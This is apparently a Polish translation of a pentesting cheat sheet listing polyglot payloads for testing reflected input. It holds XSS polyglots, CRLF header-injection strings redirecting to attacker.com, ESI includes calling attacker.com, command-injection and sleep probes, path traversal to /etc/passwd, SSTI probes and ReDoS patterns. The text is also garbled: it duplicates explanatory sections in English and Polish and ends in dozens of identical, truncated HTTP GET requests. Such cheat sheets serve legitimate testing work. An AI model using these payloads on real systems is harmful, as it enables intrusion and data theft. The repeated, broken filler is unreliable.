Reflecting Techniques - PoCs and Polygloths CheatSheet

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Celem tych PoC i Polygloths jest zapewnienie testerowi szybkiego podsumowania podatności, które może wykorzystać, jeśli jego wejście jest w jakiś sposób odbijane w odpowiedzi.

Ten cheatsheet nie proponuje wyczerpującej listy testów dla każdej podatności, tylko kilka podstawowych. Jeśli szukasz bardziej kompleksowych testów, przejdź do proponowanej podatności.

Nie znajdziesz tutaj wstrzykiwań zależnych od typu zawartości, takich jak XXE, ponieważ zazwyczaj sam spróbujesz ich, jeśli znajdziesz żądanie wysyłające dane XML. Nie znajdziesz tutaj również wstrzykiwań do bazy danych, ponieważ nawet jeśli niektóre treści mogą być odbijane, to zależy to głównie od technologii i struktury backendu bazy danych.

Lista Polygloths

{{7*7}}[7*7]
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

Podstawowe testy

{{7*7}}
[7*7]

Poligloty

A polyglot is a file that can be interpreted as different file types depending on the context in which it is executed. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.

Polyglots are typically created by taking advantage of the similarities between file formats. By carefully crafting a file that adheres to the specifications of multiple file formats, it is possible to create a polyglot that can be interpreted differently by different applications.

Polyglots can be used in various ways during a penetration test. They can be used to bypass file upload filters, evade detection by security scanners, or even execute arbitrary code on a target system.

It is important to note that the creation and use of polyglots should be done responsibly and within the boundaries of the law. Using polyglots for malicious purposes is illegal and unethical.

Poligloty

Poliglot to plik, który może być interpretowany jako różne typy plików w zależności od kontekstu, w którym jest uruchamiany. W kontekście hakowania stron internetowych, poligloty mogą być używane do omijania środków bezpieczeństwa i wykonywania złośliwego kodu.

Poligloty są zwykle tworzone poprzez wykorzystanie podobieństw między formatami plików. Poprzez staranne opracowanie pliku, który spełnia specyfikacje wielu formatów plików, można stworzyć poliglot, który może być interpretowany inaczej przez różne aplikacje.

Poligloty mogą być wykorzystywane na różne sposoby podczas testu penetracyjnego. Mogą być używane do omijania filtrów przesyłania plików, unikania wykrycia przez skanery bezpieczeństwa, a nawet do wykonywania dowolnego kodu na docelowym systemie.

Ważne jest zauważenie, że tworzenie i używanie poliglotów powinno odbywać się odpowiedzialnie i w granicach prawa. Używanie poliglotów w celach złośliwych jest nielegalne i nieetyczne.

{{7*7}}[7*7]

Podstawowe testy

;ls
||ls;
|ls;
&&ls;
&ls;
%0Als
`ls`
$(ls)

Poligloty

A polyglot is a file that can be interpreted as multiple file types. In the context of hacking, polyglots can be used to bypass security measures and execute malicious code. They are particularly useful in scenarios where different file types are allowed or expected, such as file uploads on a web application.

Polyglots are created by carefully crafting a file that adheres to the specifications of multiple file formats. By doing so, the file can be interpreted differently depending on the context in which it is opened. This allows an attacker to exploit vulnerabilities in different file parsers or interpreters.

Polyglots can be used for various purposes, including:

  • File format bypass: By disguising a malicious file as a legitimate file type, such as an image or a document, an attacker can bypass security measures that only check for specific file extensions.

  • Code execution: By embedding malicious code within a polyglot, an attacker can exploit vulnerabilities in different file parsers or interpreters to execute arbitrary commands on a target system.

  • Data exfiltration: Polyglots can also be used to exfiltrate sensitive data from a target system. By embedding the data within the polyglot, an attacker can extract it when the file is opened or processed.

Creating a polyglot requires a deep understanding of the specifications of the file formats involved, as well as the vulnerabilities in the parsers or interpreters. It is a complex and advanced technique that can be used to evade detection and carry out sophisticated attacks.

1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/

Podstawowe testy

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5